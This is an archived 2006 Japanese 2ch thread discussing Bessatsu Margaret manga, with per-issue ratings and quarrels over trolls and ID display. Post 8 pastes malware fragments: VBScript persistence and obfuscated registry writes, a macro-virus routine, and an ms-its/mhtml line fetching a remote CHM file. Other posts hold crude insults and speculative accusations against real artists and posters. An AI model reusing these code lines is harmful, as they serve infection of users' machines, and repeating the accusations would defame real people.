5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ID表示必須】別冊マーガレット24【デラマ】

1 :花と名無しさん:2006/12/13(水) 19:23:55 ID:???0
別冊マーガレットについて語りましょう。デラマの話題もOK。
公式サイト ttp://betsuma.shueisha.co.jp/

前スレ
【別マ】別冊マーガレット23【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1156320072/

2 :花と名無しさん:2006/12/13(水) 19:24:53 ID:CaOGOr+X0
★現在、スレが粘着に荒らされているため、避難所を設けています。
まともな会話ができないときはこちらへ。
ttp://jbbs.livedoor.jp/comic/3217/ (PC用)
ttp://jbbs.livedoor.jp/bbs/i.cgi/comic/3217/ (携帯用)


★必読★
このスレには、特定の漫画家を中傷する荒らしが常駐しています。
※荒らし(通称:別婆)の特徴
・「sage」で書き込む(IDが???) →自演しやすくなる
・「。。。」を語尾につけていた
・他人を装ったり、ハンドルネームを入れる
・長文で批評(特定漫画家を執拗に貶す/スレで叩かれている漫画家を無理やり持ち上げる)
・連続で投稿・深夜早朝覚醒
・自作自演
・「sage進行にしよう」と言う
★以上のような特徴のある書き込みには、絶対にレスをしないでください。
反応するあなたも荒らしです。
★ID表示推奨。メール欄を空欄にするとIDが出ます。


3 :花と名無しさん:2006/12/13(水) 19:25:26 ID:???0
☆過去ログ☆
別マが好き
http://comic.2ch.net/gcomic/kako/999/999627788.html
別マ2
http://comic.2ch.net/gcomic/kako/1015/10156/1015639862.html
【別マ(3)】
http://comic.2ch.net/gcomic/kako/1024/10245/1024504140.html
【別マ(4)】
http://comic.2ch.net/gcomic/kako/1035/10351/1035161513.html
【別マ(5)】
http://comic.2ch.net/test/read.cgi/gcomic/1046580919/
**【別マ(6)】**
http://comic.2ch.net/test/read.cgi/gcomic/1058131475/
【別マ(6)】(実は(7))
http://comic.2ch.net/test/read.cgi/gcomic/1068082717/
【別マ(8)】
http://comic2.2ch.net/test/read.cgi/gcomic/1076501895/
【別マ】別冊マーガレット(9)【デラマ】
http://comic4.2ch.net/test/read.cgi/gcomic/1081865748/
【別マ】別冊マーガレット10【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1088776455/


4 :花と名無しさん:2006/12/13(水) 19:26:25 ID:CaOGOr+X0
【別マ40周年オメ】別冊マーガレット11【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1092412007/
【別マ】別冊マーガレット12【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1096560698/
【別マ】別冊マーガレット13【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1100791148/
【別マ】別冊マーガレット14【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1103278319/
【別マ】別冊マーガレット 15【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1106040993
【ID表示必須】別冊マーガレット16【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1108204848/
【ID表示必須★gt;gt;1必読】別冊マーガレット【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1113401423/
 【別マ】別冊マーガレット18【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1120199584/
【別マ】別冊マーガレット19【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1126745837/
【別マ】別冊マーガレット20【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1132122905/
【別マ】別冊マーガレット21【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1138684841/
【別マ】別冊マーガレット22【デラマ】
http://comic6.2ch.net/test/read.cgi/gcomic/1146403948/

5 :花と名無しさん:2006/12/13(水) 19:35:06 ID:85le3zsuO
>>1

6 :花と名無しさん:2006/12/13(水) 19:37:12 ID:wyf7L93Q0
関連作家のスレ
【花より男子】神尾葉子34【キャットストリート】
http://comic6.2ch.net/test/read.cgi/gcomic/1157815998/
中原アヤ その6
http://comic6.2ch.net/test/read.cgi/gcomic/1154437380/
【君に届け】★椎名軽穂★8【ウブコント】
http://comic6.2ch.net/test/read.cgi/gcomic/1163449911/
【空気嫁】ふるかわしおりん3【自己陶酔∂】
http://comic6.2ch.net/test/read.cgi/gcomic/1141725376/
【高梨】紅色HERO 【みつば】
http://comic6.2ch.net/test/read.cgi/gcomic/1160405223/
高野苺タン 語ろ〜!!
http://comic6.2ch.net/test/read.cgi/gcomic/1076225153/
【B.O.D.Y】美森青【I LOVE YOU】
http://comic6.2ch.net/test/read.cgi/gcomic/1106923354/
【ヒーロー=オザケン】ネラー永田正実7【ヒロイン=作者】
http://comic6.2ch.net/test/read.cgi/gcomic/1158116332/
◇*藤村真理作品について*◇
http://comic6.2ch.net/test/read.cgi/gcomic/1107267664/

7 :花と名無しさん:2006/12/13(水) 19:49:36 ID:vuZSjWYTO
>>1
乙です。

8 :<body onload=window()>:2006/12/13(水) 19:52:12 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :花と名無しさん:2006/12/13(水) 20:43:13 ID:???0
コード貼ってるヤシは脳豚使いじゃないんだろうな。
でもこんなので騒ぐのはPC初心者の脳豚使いしかいないってwwww

10 :花と名無しさん:2006/12/13(水) 22:21:19 ID:PsuD73q/0
専ブラ使って無問題。

11 :花と名無しさん:2006/12/13(水) 22:46:09 ID:???O
>1乙です

12 :花と名無しさん:2006/12/14(木) 06:58:53 ID:pUG86d8v0
1月号テンプレ

【表紙・君に届け】

連載
【巻頭・バンビ】
【デビュー】
【キャット】
【君に届け】
【BODY】
【紅色】
【恋カタ】
【ファイブ】

読切
【春が・藤戸】
【ラブ・登尾】
【バリバリ・広瀬】
【ルーキー・外山】

ショート&ギャグ
【のろい】
【家族】
【執事】
【超】

次号予告
【巻頭・君に届け】

13 :花と名無しさん:2006/12/14(木) 07:15:10 ID:CAd/Doe10
にくちゃんなくなるらしいけど
とりあえず>>1

14 :花と名無しさん:2006/12/14(木) 08:34:10 ID:???0
昨日立ち読みした

【表紙・君に届け】 なんか好きじゃない。汚い。
連載
【巻頭・バンビ】 なかなかいいんじゃないの。
【デビュー】 いっぱいいっぱいで意味不明。
【キャット】 面白かった。三年経過にびっくり。
【君に届け】 今月短かったね。
【BODY】 gdgdだったけど持ち直してきた。
【紅色】 スルー。バレーじゃないの希望。
【恋カタ】 登場人物むかつく。けど好き。
【ファイブ】 地味に応援してる
読切
【春が・藤戸】 スルー
【ラブ・登尾】 スルー
【バリバリ・広瀬】 スルー
【ルーキー・外山】 スルー
ショート&ギャグ スルー

次号予告
【巻頭・君に届け】 落とすんじゃマイカ

15 :花と名無しさん:2006/12/14(木) 08:41:12 ID:???0
>>1
乙です
テンプレかりますー

【表紙・君に届け】ガンガレ!君を応援してる

連載
【巻頭・バンビ】なんか短期で終わりそう
【デビュー】ヨウとか激しく気持ち悪い。こんな二人どうでもいいですよ♪
内容もありきたりで悪い意味で先が見えない。なんでもありのいい加減さにウンザリ
【キャット】 三年も一気に時間が進んじゃうなんてやっぱり終了間近かな残念
【君に届け】休んでよかったのに
【BODY】初期のころとは別の漫画になっちゃったね
【紅色】バレーシーンは迫力があって好き
【恋カタ】なんか作者が好き勝手に描いてるのがうらやましい
【ファイブ】次世代の主力だろうに扱いが小さいね。これじゃ伸びないよ

読切
【バリバリ・広瀬】勢いがあるね

次号予告
【巻頭・君に届け】ガンガレ!


16 :花と名無しさん:2006/12/14(木) 08:46:07 ID:???0
別のスレで見たんだけど いま別マって23万部くらいしか
発行してないの?サイテー!
10年前80万部から23万て急降下しすぎだろー
連載陣に魅力がないのかな。当時の四分の一くらいの魅力てか

思うに10年間別マにいる河原と永田は責任あると思うわけ
ちなみにあたしは別婆じゃないよ

17 :花と名無しさん:2006/12/14(木) 09:32:58 ID:???O
別婆の後継者ktkr

18 :花と名無しさん:2006/12/14(木) 09:48:33 ID:be5RMhznO
テンプレ借ります。

【表紙・君に届け】かわいい
連載
【巻頭・バンビ】不幸を呼ぶ女の子の話、苺は前も描いてたよね。でも可愛いと思う。期待。
【デビュー】「考えときます」ワロタ。
【キャット】終わりそう…妹は改心したんだろうか。つーかしろ。3年は長い。
【君に届け】次回楽しみ。意外と梅は正攻法できそうな気がする。
【BODY】またホスト?男ヘタレすぎ。いずみウザすぎ。
【紅色】面白いけど動きのない絵だなー。
【恋カタ】高田の皮肉に実果オロオロが懐かしかった。終わると思うと寂しい。
【ファイブ】中身がない…絵はともかく、読切作家の頃はいい話描いてたのに。
読切
【春が・藤戸】表情が全て陰気くさい。
【ラブ・登尾】目が落書きみたい。話は好き。でも高校生が飲み屋でバイトとか、教師
が居合わせて咎めないとかありえない。
【バリバリ・広瀬】なんで好きになったの?優しいってどこが?
【ルーキー・外山】可愛い話なんだけど、野球に関してはツッコミどころ満載w
・「エースで4番」なのに背番号4?それじゃ定位置はセカンドだ。
・背番号付いたユニフォームで毎日練習する野球部などない。
・最後のホームランのとこ、バット持つ手が逆。
など。でも期待してます。

ギャグはどれもつまらなかった。

次号予告
【巻頭・君に届け】普通に楽しみ。

アルコ読み切りが楽しみです。

19 :花と名無しさん:2006/12/14(木) 09:48:48 ID:???0
>>16

10年トップ張ってる人間なら編集側に感謝されこそすれ批判される言われはないな。
批判されるとしたらいつまでたっても河原や永田を超えられない若手達と編集でしょ。

20 :花と名無しさん:2006/12/14(木) 09:52:11 ID:???0
ファイブが次世代の主力って、、、、ありえねw

21 :花と名無しさん:2006/12/14(木) 12:55:38 ID:ItkQ3Hdg0


I D 表 示 必 須


ID出さないで別婆じゃないとかワロス

22 :花と名無しさん:2006/12/14(木) 13:04:25 ID:QW6UAwruO
>>20エェェエエエエェエΣ(・ω・;)
もしファイブが看板になったら別マ卒業するよ

23 :花と名無しさん:2006/12/14(木) 13:12:12 ID:QRPLATr/O
ID必須とか馬鹿ジャネーノ?
そんなのかまわず連投するやつはいるし
つなぎ直しやPC携帯両刀とかいたら無意味じゃんwwww

24 :花と名無しさん:2006/12/14(木) 13:15:49 ID:???0
会社からなんで困るんだけど。

25 :花と名無しさん:2006/12/14(木) 13:21:42 ID:???0
「ID必須」こそ基地外の証
自分の都合のよいふうにスレを管理するつもり


26 :花と名無しさん:2006/12/14(木) 13:24:15 ID:???0
それはどうかなー
でも別婆とともにスレの雰囲気を悪くしている
もう一方の張本人が>>1であることは確か

27 :花と名無しさん:2006/12/14(木) 14:33:27 ID:be5RMhznO
>>24
会社からだからってID出して困る意味がわからない。
ID出て困るのは一日中2ちゃんに粘着してる自演厨だけでしょ。


28 :花と名無しさん:2006/12/14(木) 14:34:39 ID:XggGprr90
テンプレ借ります。

【表紙・君に届け】あんま興味ない
連載
【巻頭・バンビ】男がバンビだったというオチ? メルヘン系?でも話は面白そう。
【デビュー】やっぱり面白い。ハルナが活躍しそうで楽しみ。あとライバル出現って感じになんのかなあ。
【キャット】なんだか急展開。妹うざいな。母親の育て方のせいかな。まだ終わらないで欲しいけど。
【君に届け】どう出るのか気になる。楽しみであり不安であり。
【BODY】もうgdgd。早く終わらせて。
【紅色】うん。すぽこん。
【恋カタ】なんで前回、前々回と2ちゃん臭たっぷりだったのに今回はゼロなの?もう2ちゃんねら大好き漫画家としておおっぴらにやれよ。
【ファイブ】この作者欲求不満漫画まだやってるんだ。トイレで暇だからよんでみたけど、もうオタク臭さ杉・・・。パンツに穴って。
     むしろマンコ見せて写真撮らせたら、ギャグ漫画になるのに。しょうもない主人公が作者の脳内彼氏達に漫画内でベタ褒め
     特別扱いされる漫画ってなんでなくならないのでしょうか?正直ストーリーもないし中身もないし少女コミックとか読んでるような 
     オナニー大好きオタク少女が最近増えてきてるから人気なのかな。キモイわぁ。

読切
【春が・藤戸】あったかい話がどうとかだっけ?いい話だった気がする。こういうピュアなのって逆に新鮮。
        心情とかきちんと描ける漫画家に育って欲しいね。
【ラブ・登尾】 都合いいハプニングおきすぎ。そういう漫画家はもういらない。
【バリバリ・広瀬】 手元にないから忘れた
【ルーキー・外山】なんかワロタ。けど印象はカープ・・だけ。がんばれ

ギャグは変な髪形描く人がまたつまんないギャグ書いてることにびっくり。こむぎこだっけ?
なんか精神的におかしいんじゃないのかと思う。あの作者。それかただ寒いだけなのか。

次号予告
【巻頭・君に届け】wktk!


29 :花と名無しさん:2006/12/14(木) 14:35:16 ID:31bc3JYXO
アルコの読み切り楽しみだ。
ヤスケンでかなりハイテンション&雑なイメージになっちゃったけど(自分的に)
また以前のような切ない雰囲気で来てくれるんだろうか。


30 :花と名無しさん:2006/12/14(木) 14:50:50 ID:XggGprr90
うえ
前スレ見たら、デビューの作者さんお父さんが亡くなられたんだね
つか別婆の暴れぶりに驚いた
毎月毎月、チェックして粗探しや揚げ足とりの材料を探して
自分に都合のイイネタを2ちゃんに投下しまくって・・・・(しかもほとんどいいがかりじゃね?)

しかも今回のことはあまりに非情というか・・・・満たされない人生を他人を叩くことによって
どうにかしようとしてんのかな。虚しくないのでしょうか?お婆さん。教えて。

31 :花と名無しさん:2006/12/14(木) 14:54:38 ID:???0
>>30
デビューの作者・・・?
亡くなられたのは君に届けの作者じゃ…

32 :花と名無しさん:2006/12/14(木) 14:56:02 ID:31bc3JYXO
>>30
概ね同意なんだけど、肝心なトコ間違ってる。
亡くなったのは君に届けの作者のお父上だよ。


33 :花と名無しさん:2006/12/14(木) 14:56:43 ID:???O
>>30
勝手に別人を殺すなよw

34 :花と名無しさん:2006/12/14(木) 14:59:51 ID:???O
>>30>>28
あなたの厨度も別婆と変わらないよ

35 :花と名無しさん:2006/12/14(木) 15:09:32 ID:???0
>>34
それもあなたや私に当てはまること

36 :花と名無しさん:2006/12/14(木) 15:17:54 ID:???0
テンプレ借ります。

【表紙・君に届け】 可愛い。

連載
【巻頭・バンビ】 まあ面白かったかな。
【デビュー】 結構笑えた。ヨウ、なんか変わったなー。
【キャット】 妹意味わからん。話的には好き。
【君に届け】 短かったのは作者の父さんが亡くなったからだったのか。
貞子がんばれ!!くるみ、どう来るかな…?
【BODY】 早く終わって
【紅色】 智さん頑張れ
【恋カタ】 実果自己チューすぎだろ。不安になるのは分かるけどさ…
【ファイブ】 この人、絵も話も嫌い。人気あんの?

読切
【春が・藤戸】 丁寧な感じで良かった。
【ラブ・登尾】 うーん、印象薄い。
【バリバリ・広瀬】 何が言いたいのか全く分からなかった。
【ルーキー・外山】 まあ、まあ……

ショート&ギャグ
【のろい】 ……へ〜
【家族】 ふ〜ん
【執事】 ほぉ〜
【超】 は〜ぁ

次号予告
【巻頭・君に届け】 楽しみ


37 :31:2006/12/14(木) 15:46:12 ID:???0
ごめん…本当肝心な所をミスった
逝ってくる

38 :花と名無しさん:2006/12/14(木) 15:48:25 ID:???O
名前の番号も間違ってるよw

39 :花と名無しさん:2006/12/14(木) 16:02:24 ID:UZl/I9utO
テンプレ借ります

【表紙・君に届け】なんか少しこわい

連載
【巻頭・バンビ】結構好き。短期で終んないでほしい
【デビュー】展開バレバレだけど面白い
【キャット】3年って経ちすぎ。終んのかな残念
【君に届け】短かったけどしょうがない。ガンガレ
【BODY】あーはいはい
【紅色】すっげバレー。嫌いじゃないが
【恋カタ】実果がいっそ羨ましい
【ファイブ】気持悪い

読切
【春が・藤戸】悪くないけど口がやだ
【ラブ・登尾】都合良すぎ
【バリバリ・広瀬】つまらん
【ルーキー・外山】作者好き。野球知らなすぎ

ショート&ギャグ
【のろい】読んでない
【家族】微妙
【執事】読んでない
【超】つまらん

次号予告
【巻頭・君に届け】楽しみ。


40 :花と名無しさん:2006/12/14(木) 16:50:29 ID:???0
>31
ドンマイドンマイ。。。

>39
展開バレバレで面白い漫画がはたしてこの世にあるのかと
まったくもって恐れ入りっ(爆

デブーってバレバレというよりはあまりにくだらない結末なんで
かえって予想できなくない?ぜんぜん違う話になっちゃうとか。
ここで特定婆が叩いてるBODY以下にくだらないと思われ。
春奈がいっしょうけんめいなんちゃらをしました。ヨウが
受け止めてくれました。こればっかえんえんと続いてる。
でもラブコン、キミトドも同じか。

描こうとしてることのイメージもなく、知識もうすっぺらいから
つまらないアイデアしか浮かんでこないのよ。
困った低脳作家どもね。しかも年食ってるからリアル高校生が
なに考えてるとかも微妙にずれてきてるだろうし。

41 :花と名無しさん:2006/12/14(木) 16:53:38 ID:???0
>ここで特定婆が叩いてるBODY

バロッシュ

42 :花と名無しさん:2006/12/14(木) 17:08:47 ID:???0
本当に。。。使うんだw

43 :花と名無しさん:2006/12/14(木) 17:08:55 ID:???O
今日も別婆は元気だお(゚∀゚)


44 :花と名無しさん:2006/12/14(木) 17:09:40 ID:???0
今時(爆 なんて使うのはババア

45 :花と名無しさん:2006/12/14(木) 17:18:15 ID:V4v0/Ty90
すいません新参なんですが
河原スレがいくらさがしても
見つからないのは
この人のせいなんですね?

46 :花と名無しさん:2006/12/14(木) 17:22:13 ID:???0
キミトドにびっくりした。誰もそんな風に言っとらん。

47 :花と名無しさん:2006/12/14(木) 17:24:51 ID:???0
プロフィール
40歳・少女漫画家志望で1990年代前半に別マへ投稿したが芽が出ず
当時デビューした作家に恨みを持っており(本人談)
中傷ネタを5年も前から少女漫画板に書き込み続けている。
そのためには手段を選ばず、他の漫画家を執拗に持ち上げて
特定の漫画を落とすというやり方を延々と続けている。
被害妄想が激しく、他者との友好的関係を築けないキティのため
テンプレ羅列などに一方的な攻撃を仕掛け構ってもらおうとする。
バレバレの自作自演、別キャラ作成がライフワーク。
大人ゲイ向けの板に書き込んでいた。別爺or同人者疑惑あり
嫌韓、皇室(皇太子一家)アンチであることも発覚。
しかし本人が火病を起こしている始末。
暇さえあれば意味不明な韓国関連やブラクラのリンクを貼っていく。

48 :花と名無しさん:2006/12/14(木) 17:45:14 ID:a/5wZaz00
ID表示必須にもどったんだねーよかった。
sageは問答無用でスルーでおkだから楽。

テンプレおかりします
【表紙・君に届け】 正直言うとちょっと微妙。
連載
【巻頭・バンビ】 絵かわいい。
【デビュー】 おもしろかった。ヨウかわいい。
【キャット】 話は面白かったけど、絵が手抜きっぽくて萎える…白いしアップばっかりで単調だし。
ちょっとはこだわりとかないのかと思う。
【君に届け】 恋愛自覚かー次が楽しみ。
【BODY】 いつもより面白かった。藤とかあの女教師よりも友達とかとの絡みのほうが面白いような…
【紅色】 ちょっと感動した。のばらがあのまま説教かますみたいな展開にならなくてよかった。
【恋カタ】 実果がウザすぎ。
【ファイブ】 スルー

読切
【春が・藤戸】 絵が何か変。盛り上がりに欠ける話だった。
【ラブ・登尾】 ほんと、都合いい話だ…つーか子供と生徒じゃ子供のほうがかわいいに決まってるだろ。
前の話の時も思ったけど、この人の描く男の絵って全然かっこよくない。
【バリバリ・広瀬】 で、何で好きになったんだよ。
【ルーキー・外山】 なんで女なのになんでソフトじゃなくて野球なんだろう。絵が苦手。

ショート&ギャグ
【のろい】 スルー
【家族】 イラネ
【執事】 ちょっと笑ってしまった。
【超】 いらない

次号予告
【巻頭・君に届け】 楽しみ。


49 :花と名無しさん:2006/12/14(木) 17:57:11 ID:???O
>sageは問答無用でスルーでおkだから楽。

なにが楽なのかわかりません

50 :花と名無しさん:2006/12/14(木) 18:13:39 ID:QW6UAwruO
>>49てかなんでそこまでIDを出したくないのかが分からん

51 :花と名無しさん:2006/12/14(木) 19:09:22 ID:mxZA4JXP0
幸福屋ちょっと読んでみたかったから来月楽しみ

52 :花と名無しさん:2006/12/15(金) 00:15:24 ID:qw4ZqD/kO
sageてる椰子はスルーで

53 :花と名無しさん:2006/12/15(金) 01:23:24 ID:???0
ていうか、あげてる奴は避難所行けば?
他スレではsageて、ここではID出したりめんどくさいし

54 :花と名無しさん:2006/12/15(金) 02:03:36 ID:dI70OXQl0
避難所では婆のヲチで盛り上がってるよ

55 :花と名無しさん:2006/12/15(金) 02:05:23 ID:gRWWOH02O
>>53いや逆じゃwwwスレタイ読め

56 :花と名無しさん:2006/12/15(金) 03:56:05 ID:???0
スレタイ読めって、勝手に>>1が決めてるんじゃん。
前スレで一言の提案もなく、勝手にルール決めてるし
何様のつもりなんだろう

57 :花と名無しさん:2006/12/15(金) 04:37:43 ID:QIXtufjrO
自演婆じゃないならIDくらい出せばいいじゃん
減るもんじゃあるまいし

58 :花と名無しさん:2006/12/15(金) 07:42:30 ID:???0
ID出せ厨はスルーで

59 :花と名無しさん:2006/12/15(金) 07:58:10 ID:???0
>47
なんで90年代に10代なのに40なのよ、河原より少し下くらいだよ・・(うー、ばれる)

河婆の特徴
初期からいたがあたしの活動開始半年前くらいから活発に行動・・・
応援してるのは河原といくえみのみ。あとは河原の作風と違和感の無い人
ばかりを応援、椎名、ミヤ、など。中原やバレーの人はどうでもよく、
持ち上げたり落としたりです。
別マに対して固定的な古いイメージを持っていて、それに合わない新人などを
徹底的に叩く。広瀬はこの人につぶされたような格好になってる、
まあ実際は影響力はこのスレに来る数十人だけとしても・・・
あいじ、ふるかわなども叩く。苺は河原の作風に近い暗いぐずぐずした作風なので桶。
羅列もこの人のアイデアで別マスレだけに定着してるのはその理由。
羅列は新人を叩くための巧妙なしくみで、「つまらない、スルー」と書いて
確実に貶めておく。河原は絶対に批判しない。河原だけをけなしてない羅列もあり、
みえみえになっている。
神尾さんが別マに来たばかりのときは「別マには作風が合わない」などと
小姑のような理論を展開。神尾ファンに反撃を受けると以後沈黙。
神尾を盾に河原を叩くようなときさえスルーしている。
流れとか大勢に非常に敏感なタイプといえる・・
椎名やいくえみも褒めるけど、河原を王将としたときの駒として利用してる
だけなのではないでしょうか。とにかくみえみえであくどい。

60 :花と名無しさん:2006/12/15(金) 08:00:05 ID:???0
河婆の特徴のつづき

河原を守るためにいろいろとネット活動し、アマゾンの書評までチェックして
酷評されていないか調べている。発行部数もチェック。良い数字がでると
河原スレでどんなこんな数字出ましたーと報告。
同人時代の河原のファンだったようで、初期の「500マイル」という作品が好き
らしい。今となっては矛盾だらけのつたない単行本一冊にも満たないカスだけど、
なぜか執念深く持ち上げている。
ゲイ板、同人板に出入りし、「。。。」を使っている人を勝手にあたしだと断定。
いろいろな人に迷惑をかけている。
何度か、今度こそコテンパンにへこませてやった!という手ごたえが
あるも、ことごとく復活。並みの執念ではないのでやはり関係者かと・・・
ゲイ板、同人板はいうにおよばず、ニュース速報、皇室批判スレ、北朝鮮スレにも出現。
あたしに化けて自演することもある。
一日中板に張り付いていている。何か河原に関する書き込みをすると
一時間以内に必ず反応。巡回しているのか、通知する仕組みのブラウザでも
導入してるのかは不明。自由業だとして仕事の合間としても
この関わり方は異常です。
ネットに精通しているような印象を受けます。ハッキングするぞみたいな
おどしをかけてきたこともありますし、気持ち悪いウォッチ板にスレッドを立てたり、
常人には無い感覚がおありのようで、ひたすら不気味な存在です。
オタク男の後ろ盾があるのかも・・そういうところも漫画関係者っぽい印象。


61 :花と名無しさん:2006/12/15(金) 08:00:59 ID:???0
河婆の特徴、さらに続き

いろいろな証拠から河原好きの漫画関係者と思われます。近い位置にいる漫画家、
アシスタントとか、同人時代の仲間とか・・・オタク編集者の援護射撃などもあるのかも。
もし関係者としたらこの自演や執拗な新人たたき、個人叩きは許される行動ではなく、
卑怯の塊みたいな人だといえます。
羅列も、自演も、巡回も、同意も反論も、スレ立ても、新人叩きも、
河原以外のバレも、すべて河原のために利用。
河婆が好きな他の漫画家は河原の邪魔にならない人。

あたしが仮に何か悪かったとしても、この河婆の方が10倍も悪い。
このスレをよく知らない人はそこのところを勘違いしないように。

河婆の正体は同人経験者なのは確実ですね。
執拗さ、アングラっぽさ、人から何を思われてもかまわないというようなところ・・・
別マは2000年ごろからインターネットにちからを入れており、CGIやhtmlなどに
くわしい編集者がいると思われ。そのような者も加担してるのでしょう。
河原自身もたしか同人経験者です。その仲間かも・・・

62 :花と名無しさん:2006/12/15(金) 08:02:14 ID:t/aUWHkiO
必死すぎる…どっちもどっちだよ
ID出さなかったら普通の意見でもスルーってのも頭おかしいし
自作自演防止のためID出そうって意見にガンとして出そうとしないのも頭悪い
IEだったらコピペしたら良いだけだし、ブラウザだったらチェックするだけじゃん
なんでそんな必死なのだろう。

これだけじゃ何なので
君に届け目当てで買ったのに14P…orz軽穂たんには何も思わないけど(身内の不幸だし)
それ以外ほとんどまともに読める漫画が掲載されてないこと自体にムカついたw

63 :花と名無しさん:2006/12/15(金) 08:04:45 ID:???0
携帯厨も必死だな

64 :花と名無しさん:2006/12/15(金) 08:15:34 ID:???0
もう河婆も別婆もたくさん。キッショイんや…

ところで河原さん、今回絵すごい下手じゃなかった?
なんというか毒々しいというかケバいというか…
おばはんの化粧みたいな。せっかく巻頭のほうにあるのに
なんか違和感…これでも人気あるん?

ファイブは綺麗やった。一本一本の線にタマシイが入ってるわ。

65 :花と名無しさん:2006/12/15(金) 08:19:19 ID:ZHsQelj/O
てか上げでも下げでもどっちでもいい

66 :花と名無しさん:2006/12/15(金) 08:39:44 ID:VaTw+zSi0
>>64
自分のこと別婆ってw
むなしくないの?もう少し自演上手くなったら?w

67 :花と名無しさん:2006/12/15(金) 08:43:15 ID:gRWWOH02O
今月本当に読みごたえなかったね…てか読みきりなんであんなのが本誌にきてるのか謎。今回面白かったのデビューと短いけど君に届けくらいだ…

68 :花と名無しさん:2006/12/15(金) 08:53:37 ID:WBPfThMdO
別婆って北朝鮮の上層部みたい。
どう考えても通らない理屈を堂々と主張するあたりそっくりだな

69 :花と名無しさん:2006/12/15(金) 09:37:26 ID:lxQmbu140
今月はキャットとデビューと君に届けだな

70 :花と名無しさん:2006/12/15(金) 09:50:21 ID:GOGjK7HvO
常に上がってて
荒らしさんいらっしゃい状態のスレはここですか

71 :花と名無しさん:2006/12/15(金) 10:39:21 ID:ekfeBTk3O
紅色の扉、右側にいるの誰?
のばら?


そしてあげればいいの?
さげればいいの?

そして前スレ見てて思い出したんだけどあいじはどこにいったの?

72 :花と名無しさん:2006/12/15(金) 10:45:14 ID:7t9UutTYO
>>71
のばら…だと思う…んだけど自信ナシ。
なんか全身のバランスおかしくないか?



ID表示の話、正直どうでもいい。
ていうか別に自演厨じゃないならID表示してけばいいんじゃないのか?
どういった不都合があるのか純粋に解らないんだが。



73 :花と名無しさん:2006/12/15(金) 11:00:04 ID:???0
>>70

↑こういうのが来るから

74 :花と名無しさん:2006/12/15(金) 11:03:31 ID:???0
それにageてばかりいると、サーバーに負担かけるから。

ageたい連中は避難所行けばいいのに。
何のために避難所作ったの?バカ管理人

75 :72:2006/12/15(金) 11:09:36 ID:7t9UutTYO
>>73-74

そうか…。確かに常時age状態じゃそういう弊害あるね。
教えてくれてありがとう。

76 :花と名無しさん:2006/12/15(金) 11:19:50 ID:LGOg6uoY0
sage進行だと、また前スレみたいに
「椎名はAB型だから親が死んだと嘘ついてる」と自作自演を繰り返す
荒らしが現れる。ほっとくと延々嫌いな漫画家の悪口自演を始める。
少女漫画板はageだからといって荒らされることはまずない。
自作自演で別婆が荒らしだす可能性は高いがな。

77 :花と名無しさん:2006/12/15(金) 11:31:01 ID:???O
もはやあんたも別婆同様にウザいんですけど

78 :花と名無しさん:2006/12/15(金) 11:46:02 ID:???O
別婆同様って事はないだろうよ。


79 :花と名無しさん:2006/12/15(金) 11:52:35 ID:???0
ID出せ婆も別婆もスルーって事で。

80 :花と名無しさん:2006/12/15(金) 11:58:00 ID:???0
>>78
スルーできずに結果的に別婆に粘着してるから
空気嫁ない度は一緒だよ。

つーことで何事もなかったかのようにどうぞ


81 :花と名無しさん:2006/12/15(金) 11:58:44 ID:4Su/s4uX0
ラチあかないし、まともに会話したい人たちはこっちに移動しませんか?↓
【別マ】別冊マーガレット21【デラマ】避難スレ
http://jbbs.livedoor.jp/bbs/read.cgi/comic/3217/1142411748/

82 :花と名無しさん:2006/12/15(金) 12:02:06 ID:???O
WaT関係っていつまで続くのかな。
もう次の中原さんので最後にしてほしい。

83 :花と名無しさん:2006/12/15(金) 12:48:35 ID:POiwKMZM0
テンプレお借りします
【表紙・君に届け】色使いがこわさを演出している
連載
【巻頭・バンビ】話は楽しくないけど絵は可愛い
【デビュー】読んでみたらちょっと面白かった
【キャット】普通
【君に届け】いつも通り
【BODY】スルー
【紅色】スルー
【恋カタ】普通
【ファイブ】興味湧くくらいキモい
読切
【春が・藤戸】男が女っぽくてちょっと気持ち悪かった
【ラブ・登尾】絵がこわい。
【バリバリ・広瀬】若干ダサい。時代を感じるセンス
【ルーキー・外山】つまらんことはないけど話の流れがベタすきる
ショート&ギャグ
【のろい】絵がいただけない
【家族】絵が古臭い
【執事】絵が古臭い
【超】絵が古臭い
何故ギャグはどれも似たり寄ったりなんだ 


84 :花と名無しさん:2006/12/15(金) 13:13:09 ID:QIXtufjrO
>>81
